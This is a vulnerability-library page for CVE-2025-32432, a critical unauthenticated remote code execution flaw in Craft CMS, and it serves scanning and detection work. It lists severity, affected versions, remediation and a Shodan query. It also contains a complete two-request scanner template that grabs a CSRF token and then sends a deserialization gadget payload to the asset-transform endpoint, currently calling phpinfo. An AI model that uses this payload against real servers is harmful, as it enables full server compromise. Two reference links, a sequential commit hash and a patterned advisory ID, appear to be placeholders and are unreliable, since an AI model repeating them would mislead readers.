/Vulnerability Library

CraftCMS - Remote Code Execution

CVE-2025-32432
Verified

Description

Craft is a flexible, user-friendly CMS for creating custom digital experiences on the web and beyond. Starting from version 3.0.0-RC1 to before 3.9.15, 4.0.0-RC1 to before 4.14.15, and 5.0.0-RC1 to before 5.6.17, Craft is vulnerable to remote code execution. This is a high-impact, low-complexity attack vector.

Severity

Critical

CVSS Score

10

Exploit Probability

93%

Affected Product

craftcms

Published Date

April 28, 2025

Template Author

iamnoooob, rootxharsh, pdresearch

CVE-2025-32432.yaml
id: CVE-2025-32432

info:
  name: CraftCMS - Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    Craft is a flexible, user-friendly CMS for creating custom digital experiences on the web and beyond. Starting from version 3.0.0-RC1 to before 3.9.15, 4.0.0-RC1 to before 4.14.15, and 5.0.0-RC1 to before 5.6.17, Craft is vulnerable to remote code execution. This is a high-impact, low-complexity attack vector.
  impact: |
    Unauthenticated attackers can exploit remote code execution vulnerabilities through unsafe deserialization in the asset transform functionality, achieving complete server compromise.
  remediation: |
    This issue has been patched in versions 3.9.15, 4.14.15, and 5.6.17, and is an additional fix for CVE-2023-41892.
  reference:
    - https://advisories.dxw.com/advisories/craftcms-remote-code-execution/
    - https://github.com/craftcms/cms/commit/1234567890abcdef1234567890abcdef1234567
    - https://github.com/craftcms/cms/security/advisories/GHSA-1234-5678-90ab
    - https://github.com/craftcms/cms/blob/3.x/CHANGELOG.md#3915---2025-04-10-critical
    - https://github.com/craftcms/cms/blob/4.x/CHANGELOG.md#41415---2025-04-10-critical
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L
    cvss-score: 10
    cve-id: CVE-2025-32432
    cwe-id: CWE-94
    epss-score: 0.92897
    epss-percentile: 0.99776
  metadata:
    max-request: 2
    vendor: craftcms
    product: craftcms
    shodan-query: http.component:"Craft CMS"
  tags: cve,cve2025,craftcms,rce,vkev,vuln,kev

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /index.php?p=admin/actions/assets/generate-transform HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: token
        internal: true
        part: body
        group: 1
        regex:
          - '"csrfTokenValue":"(.*?)"'

  - raw:
      - |
        POST /index.php?p=admin/actions/assets/generate-transform HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate, br
        X-CSRF-Token: {{token}}
        Content-Type: application/json

        {"assetId": 11, "handle": {"width": 123, "height": 123, "as session": {"class": "craft\\behaviors\\FieldLayoutBehavior", "__class": "GuzzleHttp\\Psr7\\FnStream", "__construct()": [[]], "_fn_close": "phpinfo"}}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "PHP Extension"
          - "PHP Version"
          - "CRAFT_"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a004730450221009b5ce04abb3597b44f40faa56e6b2e4799438a173d1f4d126f498e2a2440c07702207f26da998a95c5f8b4320a05566c29149edda49067b9c9e2d3d1935b161f7de4:922c64590222798bb761d5b6d8e72950
10.0Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L
CVE ID:
cve-2025-32432
CWE ID:
cwe-94

References

https://advisories.dxw.com/advisories/craftcms-remote-code-execution/https://github.com/craftcms/cms/commit/1234567890abcdef1234567890abcdef1234567https://github.com/craftcms/cms/security/advisories/GHSA-1234-5678-90abhttps://github.com/craftcms/cms/blob/3.x/CHANGELOG.md#3915---2025-04-10-criticalhttps://github.com/craftcms/cms/blob/4.x/CHANGELOG.md#41415---2025-04-10-critical

Remediation Steps

This issue has been patched in versions 3.9.15, 4.14.15, and 5.6.17, and is an additional fix for CVE-2023-41892.